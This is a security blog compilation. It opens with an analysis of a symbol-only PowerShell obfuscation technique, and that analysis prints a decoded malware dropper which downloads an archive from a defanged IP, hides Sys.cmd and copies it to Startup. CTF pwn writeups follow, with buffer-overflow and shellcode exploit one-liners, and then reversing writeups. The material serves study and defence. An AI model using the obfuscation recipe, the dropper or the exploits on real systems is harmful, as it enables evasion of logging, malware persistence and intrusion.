In this post, I will be going over some obfuscation techniques I saw recently for Powershell. About a week ago I saw a tweet where the user was asking for help with this weird Powershell file he saw.

After looking around I found a blog post from 2010 that looks extremely similar in structure to the code in the tweet.

Concept

Powershell is a very common vector for the first stage of a malware life cycle. Unlike Office Macros, it’s usually not blocked as Windows administrators commonly use it. However, since it’s such a common vector administrators will often set up logging for it and will check for suspicious calls like iex which will execute a string as Powershell code.

However, by obfuscating your payloads you can, in theory, bypass basic logging that only checks top-level PowerShell files.

Obscuring variable names

There are reserved characters that cannot be a variable name by default. For example whitespace. The following line is not a valid line of Powershell.

$           = "test";

However, this can be bypassed if you include curly brackets around the “invalid” characters. For example, the following line is completely valid.

${           } = "test";

Each different variation of whitespace characters will correspond to a different variable. For example, all the defined variables in the next example are considered different and unique variables.

${           } = "test";
${  } = 12;
${    } = 2.0;

Generating characters

The end goal for many Powershell scripts is to call iex on a string that contains a malicious payload. To go even further you could call iex on a string that is created at runtime from decimal values.

To achieve this you’d need to use the [char] operator. This operator casts a decimal value into a character. For example [char]117 would become "u". By abusing the [char] operator a huge string of decimals could be converted into characters which could then be executed by iex.

However, for that to work we’d need the following characters: ‘c’, ‘h’, ‘a’, ‘r’, ‘i’, ‘e’, ‘x’.

Building “char”

In Powershell @{} defines an empty hash map. If you store it as a partial expression and then cast it to a string you’d get System.Collections.Hashtable. This string contains ‘c’, ‘h’, and ‘a’. To retrieve the different characters we will need the numbers 0 - 9.

In Powershell an empty partial expression is treated as null, however, if you add something to it, it will convert to an int.

$a = +${}

After the previous line executes $a would contain zero. The following code can then be executed to acquire numbers 0 - 9.

$a  = +$();     # 0
$b  =   $a;     # 0
$c  = ++$a;     # 1
$d  = ++$a;     # 2
$e  = ++$a;     # 3
$f  = ++$a;     # 4
$g  = ++$a;     # 5
$h  = ++$a;     # 6
$j  = ++$a;     # 7
$k  = ++$a;     # 8
$l  = ++$a;     # 9

Once the numbers are generated we can start creating some strings. However, at this point [char] cannot be created as we are still missing "r". Fortunately, we can abuse another one of Powershell’s systems to get that.

$? returns True or False depending on if the prior line was executed successfully. By casting $? into a string we can get the "r" from True.

"$?"[$c]

The following code fully builds [cHar].

Note: Powershell is case insensitive. Therefore, it doesn’t matter that we built [cHar] not [char]

$x = "["  +  "$(@{})"[$j] +  "$(@{})"["$c$l"] + "$(@{})"["$d$b"]  + "$?"[$c] + "]" # [cHar]

Building iex

For iex only “x” is missing. “x” is a little more difficult to acquire. If you were to look at the documentation for String.Insert you’d see that in its function signature it contains “startIndex”.

If you take a string, call insert on it, and cast it into a string you’ll get the signature. By pulling the 27th character you can acquire “x.”

$method = "".insert
Write-Host "$method"[27] # Outputs x

Since this obfuscation technique only uses symbols we can generate “insert” at runtime by indexing the characters of the Hashtable variable.

$y = "".("$(@{})"["$c$f"]   #i
    + "$(@{})"["$c$h"]      #n
    + "$(@{})"[$b]          #s
    + "$(@{})"[$f]          #e
    + "$?"[$c]              #r
    + "$(@{})"[$e])         #t
    #string Insert(int startIndex, string value)

$z=  "$(@{})"["$c$f"]  +  "$(@{})"[$f]  +"$y"["$d$j"]  } # iex

Generating the payload

By taking the [char] variable you can build a huge string of decimal values that, if treated as characters, would be legal Powershell code.

For example, if you were to convert Write-Host hello! to decimal values you’d get 87 114 105 116 101 45 72 111 115 116 32 104 101 108 108 111 33. By prefixing each value with [char] you can then convert the string back into Write-Host hello!. If you also pipe (|) it into iex Powershell would then also execute the string as code.

[char]87 + [char]114 + [char]105 + [char]116 + [char]101 + [char]45 `
    + [char]72 + [char]111 + [char]115 + [char]116 + [char]32 `
    + [char]104 + [char]101 +[char]108 + [char]108 + [char]111 `
    + [char]33 | iex

Since earlier we already created 0 - 9 we can obfuscate the prior Powershell code by removing the numbers and replacing them with variables, that at runtime would evaluate to numbers and [char].

"$x$k$j + $x$c$c$f + $x$c$b$g + $x$c$c$h + $x$c$b$c + $x$f$g + $x$j$d +
$x$c$c$c + $x$c$c$g + $x$c$c$h + $x$e$d + $x$c$b$f + $x$c$b$c +$x$c$b$k +
$x$c$b$k + $x$c$c$c + $x$e$e" | iex | iex

Note: there are two iex’s as the first one converts the string "[char]87 ..." to [char]87 which is "h" and then the second iex executes the string as code.

Manual Deobfuscation

1. sed 's/}[ ]*{/}\n{/g'
2. sed 's/;/;\n/g'
3. sed 's/[ ]*++[ ]*/ ++/g'
4. sed 's/{[ ]*$/{$/g'
5. Replace all ${ } variables with actual names
6. Look for instances of $(), @{} and $?
7. Find the variable that will become [char] and replace all instances of it with [char].
8. Find huge string containing multiple instances of [char]
9. Convert decimal characters to ascii.

After running all the sed commands and cleaning up the variable names, before step 7, I have this.

Note: The [char] elements have been shortened for brevity.

('-----'  |%{$a=+$()}   # 0
    {$b  = $a}          # 0
    {$c  =  ++$a}       # 1
    {$d  =  ++$a}       # 2
    {$e  =  ++$a}       # 3
    {$f  =  ++$a}       # 4
    {$g  =  ++$a}       # 5
    {$h  =  ++$a}       # 6
    {$j  =  ++$a}       # 7
    {$k  =  ++$a}       # 8
    {$l  =  ++$a}       # 9

    # [cHar]
    {$m=  "["
        + "$(@{})"[$j]      # c
        + "$(@{})"["$c$l"]  # H
        + "$(@{})"["$d$b"]  # a
        + "$?"[$c]          # r
        + "]"  }

    #string Insert(int startIndex, string value)
    {$a  ="".("
        $(@{})"[  "$c$f"]   # i
        + "$(@{})"["$c$h"]  # n
        + "$(@{})"[$b]      # s
        + "$(@{})"[$f]      # e
        + "$?"[$c]          # r
        + "$(@{})"[$e])}    # t

    # iex
    {$a=  "$(@{})"["$c$f"]  +  "$(@{})"[$f]  +"$a"["$d$j"]  }
);

"$m$c$e + $m$c$b + $m$e$h + $m$j$j + $m$c$c$d + $m$c$c$g + $m$e$d + $m$h$c |$a"|&$a

After putting in [char] and recreating all the original decimal values the huge string will start like this.

[char]23
+ [char]21
+ [char]36
+ [char]77
+ [char]220
+ [char]225
+ [char]30
+ [char]62
+ [char]30
+ [char]34
+ [char]67
+ [char]58
+ [char]90
...

If you dump the long string into Powershell you’ll get

After cleaning that all up you’ll get the following Powershell code.

Note: URL is defanged for safety purposes.

$Mps = "C:\User"
New-Item -ItemType Directory -Force -Path $Mps | Out-Null

$cmdxx = "C:\User\Sys.cmd"
$url2 = 'hXXp://35[.]163[.]204[.]167/esfsdghfrzeqsdffgfrtsfd[.]zip'
$dir3 = $Mps + '\xxrrffftttbbb.zip'

$client = new-object System.Net.WebClient
$client.DownloadFile($url2,$dir3);

(new-object -com shell.application).namespace($Mps)
    .CopyHere((new-object -com shell.application).namespace($dir3).Items(),4 + 16) | Out-Null

$xvwe = 'Sys.cmd'
$zz=Get-Item $cmdxx
$zz.Attributes+="Hidden,System"

$startup = [System.Environment]::GetFolderPath("Startup") + "\" + $xvwe
Copy-Item $cmdxx $startup  | Out-Null

[System.Threading.Thread]::Sleep(3000)
& $cmdxx
remove-item $dir3 | Out-Null

To summarize it the script pulls a file from a malicious domain and saves it to C:\Users. Following this, it unzips the archive, sets Sys.cmd as a hidden and a system file, copies it to C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup, waits 3 seconds, and then executes the file. After executing the file the original archive is deleted.

Conclusion

Warning: repo contains malware! Use at your own risk.

Full files can be found at my malware-research repo.

References

• Original Tweet: https://twitter.com/LawrenceAbrams/status/1514634960833073158?s=20&t=vIa0fSK3stteiaPvVlZ0VQ
• Repository full of fun Powershell obfuscation techniques: https://github.com/danielbohannon/Invoke-Obfuscation
• Blog post explaining similar Powershell script: https://pcsxcetrasupport3.wordpress.com/2018/10/28/understanding-invoke-x-special-character-encoding/
• Original post explaining this technique: https://perl-users.jp/articles/advent-calendar/2010/sym/11

This page details my pwn writeups for The University of Massachusetts Amherst CTF. This CTF was originally just an internal CTF but I knew one of the moderators Sam. Overall it was a great CTF and I really enjoyed it; they definitely had some unique challenges.

All my scripts and the provided files from the CTF can be found here.

Baby Overflow I

Prompt

This is my first program. Be nice :)

nc 34.75.105.136 1024

TLDR;

Looking at the binary in GDB we see that the buffer is 16 characters and right above it is the variable for should_get_flag. Therefore, we should write in 16 junk characters and then write in 0x1.

python -c "import struct; out = 'A'*0x10; out += struct.pack('I', 0x1); print(out)" | nc 34.75.105.136 1024

Flag

UMASS{N3v3r_g0nn4_m3s$_th1s_up}

Baby Overflow II

Prompt

When my friend Ptasie Mleczko typed in his name, it gave him the flag. It was weird, but I think I fixed it.

nc 34.75.105.136 1025

TLDR;

The binary is pretty much the same, however, this time it expects a specific value instead of a boolean True value.

python -c "import struct;out = 'A'*0x10;out += struct.pack('I', 0xB16B00B5);print(out)" | nc 34.75.105.136 1025

Flag

UMASS{Dyslexic_D0g_1nth3$ky}

Baby Overflow III

Prompt

Okay, now it’s really secure.

nc 34.75.105.136 1027

TLDR;

For this challenge one has to gain control of the RIP to change execution flow. This can be done by overloading the buffer, the saved RBP value on the stack and then by inserting the address one would like to execute at.

(python -c "import struct;out = 'A'*0x10;out += 'bbbbbbbb';out += struct.pack('Q', 0x401132); out += struct.pack('Q', 0x401060); print(out)"; echo) | nc 34.75.105.136 1027

Flag

UMASS{first_step_to_rop}

Baby Overflow IV

Prompt

I don’t even know why I had that function in the first place…

nc 34.75.105.136 1028

TLDR;

(python -c "import struct;out = 'A'*0x10;out += 'bbbbbbbb';out += struct.pack('Q', 0x0000000000404060); print('\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05');print(out)"; cat -) | nc 34.75.105.136 1028

Once in the shell type cat flag

Flag

UMASS{now_you_can_really_call_yourself_a_hacker}

format_what

Prompt

We just learned format strings in 230, can you check if I’m doing it right?

nc 34.75.105.136 1030

TLDR;

python -c "print('%lu '*20)" | nc 34.75.105.136 1030 | (read -r i; read -r s; for i in $s; do python3 -c "import struct; print(struct.pack('Q', $i))"; done)

Flag

UMASS{n0_f0rm4t_n33d3d!?}

This page details my reversing writeups for The University of Massachusetts Amherst CTF. This CTF was originally just an internal CTF but I knew one of the moderators Sam. Overall it was a great CTF and I really enjoyed it; they definitely had some unique challenges.

All my scripts and the provided files from the CTF can be found here.

Baby Crackme I

Prompt

I haven’t touched a computer since I retired. Can you help me decipher this program I wrote 30 years ago? …

You should be able to solve this one, even if you’ve never written C before; it isn’t essential to understand every single line. If you do want a quick (one page) reference on C, though, look here.

Created by @Jakob

Hint

Strings in C are arrays of characters.

TLDR;

The flag is declared in plaintext in the source file which is compared against the users input. You can pull it out yourself you have bash do the heavy lifting for you.

head -n38 crackme.c | tail -n +7 | cut -d "=" -f 2 | cut -d ')' -f 1 | tr -d "\n\r' "

Solution

Since the source code for this challenge is provide I just opened the file in a text editor.

#include <stdio.h>
#include <string.h>

int check_flag(const char *flag)
{
    if (strlen(flag) != 32) { return 0; }
    if (flag[0]  != 'U')    { return 0; }
    if (flag[1]  != 'M')    { return 0; }
    if (flag[2]  != 'A')    { return 0; }
    if (flag[3]  != 'S')    { return 0; }
    if (flag[4]  != 'S')    { return 0; }
    if (flag[5]  != '{')    { return 0; }
    if (flag[6]  != 's')    { return 0; }
    if (flag[7]  != 'o')    { return 0; }
    if (flag[8]  != 'm')    { return 0; }
    if (flag[9]  != '3')    { return 0; }
    if (flag[10] != 't')    { return 0; }
    if (flag[11] != '1')    { return 0; }
    if (flag[12] != 'm')    { return 0; }
    if (flag[13] != '3')    { return 0; }
    if (flag[14] != 's')    { return 0; }
    if (flag[15] != '_')    { return 0; }
    if (flag[16] != '1')    { return 0; }
    if (flag[17] != 't')    { return 0; }
    if (flag[18] != '_')    { return 0; }
    if (flag[19] != '1')    { return 0; }
    if (flag[20] != 's')    { return 0; }
    if (flag[21] != '_')    { return 0; }
    if (flag[22] != 't')    { return 0; }
    if (flag[23] != 'h')    { return 0; }
    if (flag[24] != '1')    { return 0; }
    if (flag[25] != 's')    { return 0; }
    if (flag[26] != '_')    { return 0; }
    if (flag[27] != '3')    { return 0; }
    if (flag[28] != '4')    { return 0; }
    if (flag[29] != 's')    { return 0; }
    if (flag[30] != 'y')    { return 0; }
    if (flag[31] != '}')    { return 0; }
    return 1;
}

int main(int argc, char **argv)
{
    char flag[64];

    fgets(flag, sizeof(flag), stdin);
    if (strchr(flag, '\n')) { *strchr(flag, '\n') = '\0'; }

    if (check_flag(flag)) {
            printf("License key accepted.\n");
    } else {
            printf("Try again.\n");
    }
}

For anyone who understands C this code is pretty easy to understand. For those who do not understand C they may not get what is going on. In C, and most languages main is the function that is called “first” when the program is executed.

In the function declaration we can see main takes two arguments int argc and char **argv. These are automatically passed by the operating system when the program is called. argc is the number of command line arguments being passed while argv is a array of strings, in C strings are arrays of characters. You can also things of argv as the commands you pass via the command line.

For example running the following comand ./chall test 1 b. argc would equal 4 and argv would contain ['/home/user/Documents/chall', 'test', '1', 'b']. Note: the first argument for argv is always the path of the running executable!

Once in main the program creates a buffer called flag. for a string of 64 characters. Following this it gets input from stdin of 64 characters and stores it in flag. After pulling the input from the user it removes any new lines in the string buffer. Then the flag is passed to check_flag.

This function is where the “meat” of the problem is. Here we can see each value of the users input is compared against some hardcoded values. You COULD pull the flag out by hand, but I’ve been trying to practice my bash scripting so I decided to use bash to solve this challenge.

First we need to just get the lines relevent to use to do that we can use head and tail. After that we need to pull out just the flag values which can be achieved with two calls to cut. At this point the output is just the flag but its across multiple lines so we can use tr to remove the newline characters.

head -n38 crackme.c | tail -n +7 | cut -d "=" -f 2 | cut -d ')' -f 1 | tr -d "\n\r' "

Flag

UMASS{som3t1m3s_1t_1s_th1s_34sy}

Baby Crackme II

Prompt

… back then, compilers weren’t very good. I wrote this version, hoping it would be faster. Can you help me figure out what I chose for the “license key”? …

You might need to understand a little bit more C for this one, but I believe in you!

Created by @Jakob

Hint

Characters in C are just numbers. This is a useful mapping of numbers to letters.

TLDR;

Assembly is inlined to compare each character of the users input against hard coded values. This one is definitely a little more tedious to pull out by hand.

for word in $(grep -i CMP crackme.c | cut -d ',' -f2 | tail -n +2|cut -d ')' -f1); do printf "\x$(printf %x $word)"; done;

Solution

Like the prior challenge the source code is provided so I’ll just use a text editor to view this challenge.

#include <stdio.h>
#include <string.h>
#include <stdint.h>

int check_flag(const char *flag)
{
    struct registers {
            uint64_t rax;
            uint64_t flags;
    };

    #define FLAG_EQUAL 1 << 1

    #define MOV(dst, src) dst = (uint64_t) src
    #define ADD(dst, src) dst += src
    #define CMP(a, b)     if (a == b) regs.flags |= FLAG_EQUAL;
    #define JNE(label)    if ((regs.flags & FLAG_EQUAL) == 0) goto label;

    #define MOVZX_DEREFERENCE_BYTE(dst, src) dst = *((uint8_t *) src)

        if (strlen(flag) != 32) { return 0; }

        struct registers regs;
        regs.rax = 0;
        regs.flags = 0;

        MOV(regs.rax, flag);
        ADD(regs.rax, 0);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 85);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 1);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 77);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 2);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 65);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 3);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 83);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 4);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 83);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 5);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 123);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 6);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 118);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 7);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 49);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 8);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 114);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 9);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 55);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 10);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 117);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 11);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 52);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 12);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 108);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 13);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 95);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 14);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 109);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 15);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 52);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 16);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 99);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 17);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 104);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 18);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 49);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 19);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 110);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 20);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 51);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 21);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 53);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 22);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 95);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 23);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 52);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 24);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 114);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 25);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 51);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 26);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 95);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 27);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 99);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 28);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 48);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 29);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 48);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 30);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 108);
        JNE(fail);

        MOV(regs.rax, flag);
        ADD(regs.rax, 31);
        MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
        CMP(regs.rax, 125);
        JNE(fail);

        MOV(regs.rax, 1);
        goto exit;

    fail:
        MOV(regs.rax, 0);
        goto exit;

    exit:
        return regs.rax;
}

int main(int argc, char **argv)
{
    char flag[64];

    fgets(flag, sizeof(flag), stdin);
    if (strchr(flag, '\n')) { *strchr(flag, '\n') = '\0'; }

    if (check_flag(flag)) {
            printf("License key accepted.\n");
    } else {
            printf("Try again.\n");
    }
}

This challenge is pretty similar to Crackme I, it may just not look like it at first. The reason behind that is because the author obfuscated the code slightly by using custom macros to achieve pseudo assembly. The assembly language level is primarily where binary reverse engineering is performed.

Luckily this function’s main is identical to the prior challenges. The main difference here is the check_flag function. As I said earlier the author utilizes custom macros to define assembly instructions. There is essentially just one block that is repeated over and over.

MOV(regs.rax, flag);
ADD(regs.rax, #1);
MOVZX_DEREFERENCE_BYTE(regs.rax, regs.rax);
CMP(regs.rax, #2);
JNE(fail);

In this block we load the flags register and grab an address offset from it. Following that we pull the actual contents of the address in register. Finally we do a comparison against a hardcoded value. If the comparison fails we jump to the fail block, otherwise we keep going.

The only values that change in the block are #1 and #2. For each consecutive block #1 is incremented, this is acting as the array, or string index. The #2 value is being used as the hardcoded value that the character SHOULD equal. The #2 value is what we need for the flag!

Like the past challenge I used bash to solve this one, for this it makes a little bit more sense because you’d have to pull out the values by hand and convert them to ASCII which is a pain.

First lets pull away everything except the CMP statements as those contain the values we need. This can be achieved with the grep command, unfortunately when CMP is defined it is pulled too so lets ignore that will tail. After we pull out the CMP lines we need to pull out the value which can be achieved with cut like in the prior challenge. Just like before we now have our “flag” except all the values are on separated lines and still in the decimal equivalent and not in its ASCII printable form. So instead of deleting all the newlines this time we will iterate over each line and convert it to ASCII using printf

for word in $(grep -i CMP crackme.c | tail -n +2 | cut -d ',' -f2 | cut -d ')' -f1); do printf "\x$(printf %x $word)"; done;

Flag

UMASS{v1r7u4l_m4ch1n35_4r3_c00l}

Baby Crackme III

Prompt

… and I lost the source code to this one. But you’ve worked your magic for the past two, so I’m sure you can figure this one out?

Welcome to hard mode! You’re going to have to learn to disassemble a binary.

Computers actually can’t run C or Java without compiling it down to “machine code” first. “Assembly” is a set of phrases we associate with certain “instructions” in machine code so that we can read it.

There are plenty of disassemblers out there, but an easy way of spitting out the assembly code to the terminal is:

objdump -D -Mintel crackme

But you’re going to have to do some digging on your own :)

Maybe try looking up “reverse engineering linux binary”?

Created by @Jakob

Hint

Once you get the disassembly, this is very similar to Baby Crackme II.

TLDR;

Loading the binary in IDA we see that it calls a check_flag function. Inside of that function it works almost identically to the prior challenge. We can use gdb to dump out the function and then the same script as before to get the flag!

gdb -batch -ex 'file crackme' -ex 'disassemble check_flag' | for word in $(grep -i CMP | cut -d ',' -f2 | tail -n +2|cut -d ')' -f1); do printf "\x$(printf %x $word)"; done;

Solution

For this challenge we are finally given a binary file instead of a source file. This means I won’t be able to just open it in a text editor and look at the source code, but instead will need to use a tool to disassemble the binary into assembly.

There are a bunch of good tools out there my favorites are either Ghidra or IDA. IDA has a nicer interface but it does not have as much features as Ghidra; in the free version that is.

Regardless, once the binary is opened in a disassembler the main function should pop up. The main is pretty simple (it’s actually the same main we’ve seen before). We can see a call to fgets to get the user input and after that the calls to strchr to remove the newline. After those calls check_flag is called and based on its output we either get the good or bad message just like before.

So just like before let’s check out check_flag.

For someone not too familiar with reversing check_flag may look pretty complicated, but after you understand what is going on it isn’t really.

The first few lines checks the strings input to see if its the right length. If it is we keep going. Then we perform four lines of assembly; this should look very familiar. It is essentially the same commands we saw back in Crackme II! So just like I and II this function checks each value individually to see if it is the correct value and then returns 1 or 0 depending on if it failed or not.

Like before we can pull this out manully or use some scripting to achieve our goal, I chose the later. We can actually use the same script as last time, however we just need to provide it with the disassembly as we don’t have it this time in a file. To do that we can use gdb, or the GNU Debugger [which every reverse engineer (that does stuff on Linux) should be familiar with], to dump the check_flag function.

gdb -batch -ex 'file crackme' -ex 'disassemble check_flag' | for word in $(grep -i CMP | cut -d ',' -f2 | tail -n +2|cut -d ')' -f1); do printf "\x$(printf %x $word)"; done;

Flag

UMASS{now_you_c4n_put_4ss3mbly_on_your_r3sum3}

Linear Algebra

Prompt

Meh. I never understood why they make the CS students take MATH 235.

You’re going to have to disassemble this one, too. Sorry :)

Created by @Jakob

Hint

I’d go about this by writing down the equalities that are being checked in terms of symbolic variables (i.e. α + β + γ = 277), figuring out where the equations overlap, and then using the math skills I learned in high school.

TLDR;

Throw it at ANGR

import os
import angr


PATH = os.path.join(os.path.dirname(__file__), "crackme")


def main():

    proj = angr.Project(PATH, auto_load_libs=False)
    simulation = proj.factory.simgr()

    constraint = lambda s: b"License key accepted" in s.posix.dumps(1)
    simulation.explore(find=constraint)
    if simulation.found:
        pprint(simulation.one_found)


def pprint(solutions):
    str_solutions = solutions.posix.dumps(0).replace(
        b'\x00', b'\n').decode('utf8', errors='ignore').strip().split('\n')

    for solution in str_solutions:
        print(f"Flag found: {solution}")


if __name__ == '__main__':
    main()

Solution

Like Crackme III we are provided with a binary for this challenge so load it up in your favorite disassembler. Once in main we can see its still the same ole thing, so let’s go ahead to check_flag.

check_flag is pretty much the same this time but I really do not wanna do the math to figure out the flag so I’m gonna let a robot do it.

For this challenge I used ANGR a symbolic execution framework. Symbolic execution tools purpose, or at least one of their purposes, is to find all the paths of a program. Therefore we can use this to get us our flag!

ANGR abstracts away a lot of things for you which makes it easier to write quick scripts.

import os
import angr


PATH = os.path.join(os.path.dirname(__file__), "crackme")


def main():

    proj = angr.Project(PATH, auto_load_libs=False)
    simulation = proj.factory.simgr()

    constraint = lambda s: b"License key accepted" in s.posix.dumps(1)
    simulation.explore(find=constraint)
    if simulation.found:
        pprint(simulation.one_found)


def pprint(solutions):
    """ Helper that prints the solution in a more human readable format

    simulation - angr simulation object that represents the state the program is in
    """

    str_solutions = solutions.posix.dumps(0).replace(
        b'\x00', b'\n').decode('utf8', errors='ignore').strip().split('\n')

    for solution in str_solutions:
        print(f"Flag found: {solution}")


if __name__ == '__main__':
    main()

In main we first setup our environment with creating proj and simulation. After that we create our constraint or what we want ANGR to solve for. In this case we are looking for License key accepted being found in the output (standard output is the file descriptor 1 for *NIX Systems). We then pass this constraint to explore and ask our simulation object if anything is found. If there is a solution we then print it with pprint.

Fun fact: you can actually use the exact same script for Crackme III since the output we are looking for is the same. The only change that needs to be made is the filename in the PATH variable.

Flag

UMASS{c0mpu73r_5c13nc3_15_ju57_m47h}

Even/Odd

Prompt

I made this program that generates the flag and writes it to the console. It’s really fast!

Created by @Jakob

Hint

It isn’t “really fast”. This is an “optimize me” challenge. There are a couple of ways to go about this, but the easier routes involve “binary patching”. That’s the keyword you should be looking for online.

TLDR;

Patch the binary to calculate if an number is even / odd in a more optimized manner. At address 0x11BD modify the next 8 bytes from 0x48 0x8b 0x45 0xE8 0x48 0x89 0x45 0xF8 0xeb 0x1c to 0x48 0x89 0xF8 0x48 0x83 0xE0 0x01 0x90 0xeb 0x41

mov rax, rdi
and rax, 1
nop
jmp short locret_1208

Solution

Let’s open this binary up. Its main is pretty bare bones. First a string is dumped and then lsr is called; lsr it is.

lsr is a tad bit more complicated. We initalize some variables (rbp-8, rbp-9, rbp-4) to 0. Following that we check rbp-4 against a hardcoded value 0x1327 and if we are less than or equal to it we jump, otherwise we leave this function. It is safe to assume rbp-4 is the loop index value. After that we do some “maths” to the value at rbp-4 and use the resulting value to pull a value from value a hardcoded array. At this point do not be to worried about that math stuff that is going on. All we care about is that based on the index value we perform some calculations and pull a value from values based on the result. This new value along with a partial result from the math calculates is passed to is_really_odd. Based on the return from is_really_odd we either perform an or operation or keep going. Following that we check to see if rbp-8 is 8 if it is we will print a character to the screen. We can assume that the flag will get printed to the screen. Following the print rbp-8 is set to 0 and rbp-9 is set to the contents of eax and the loop index is incremented.

At this point there is a lot going on in this function and it seems pretty complicated especially since we are only looking at this statically and not dynamically. Before trying to debug this lets look into is_really_odd, especially since the name of the challeneg is Even/Odd.

In even we seem to loop and perform some math eventually calling is_odd and either returning 0 or 1. At this point I am assuming if it is odd 1 is returned otherwise 0 is returned. Let’s look into is_odd.

Here we see the input is compared against 0 if it is 0 we return 0 otherwise we subtract the input by 1 and call is_even with it. Alright… let’s look into is_even

Hmm.. okay so the same code except it calls is_odd and this returns 1 if the value is 0. So essentially this code will recursively call is_even / is_odd until one reaches 0 and whoever reaches zero determines if a function is even or odd; this makes sense but it is not really efficient. Let’s go back to is_really_odd and try to see if we can patch this program to be more efficient.

As far as I understand the value in RSI is just used to speed up the calculations by shrinking the input value a little bit. I’m not entirely sure as I didn’t really look much into it as it looks like all we really care about is if RSI is even or odd.

For us to see if an number is even or odd all you have to do is AND it against 1. If it is even it will return 0 and if it is odd it will return 1; so lets do that.

By patching out lines 6, 7, and 8 we can modify this program to better calculate even odds.

Out of all the reversing challenges I have to say this one was probably my favorite because it was fairly unique.

Flag

UMASS{w0w_y0ur3_p4713n7}

Marius

Prompt

I wanted to do my 575 homework in LaTeX, so I asked him what he used for editing. He sent me this.

TLDR;

The elisp script takes in a 30 long character string. Discards the first 6 characters and the last character. It then swaps characters through out the string and compares the final manged string against a hardcoded one 1v_ms14__ks1rtpk_1dd13s.

Solution

For this challenge we are given an .el file which stands for Emacs Lisp. Since this is just a source file we can open it in a text editor. Unfortunately it doesn’t make a lot of sense. Turns out the alias check-key is elips byte code so it will need to be disassembled before we can figure out what to do.

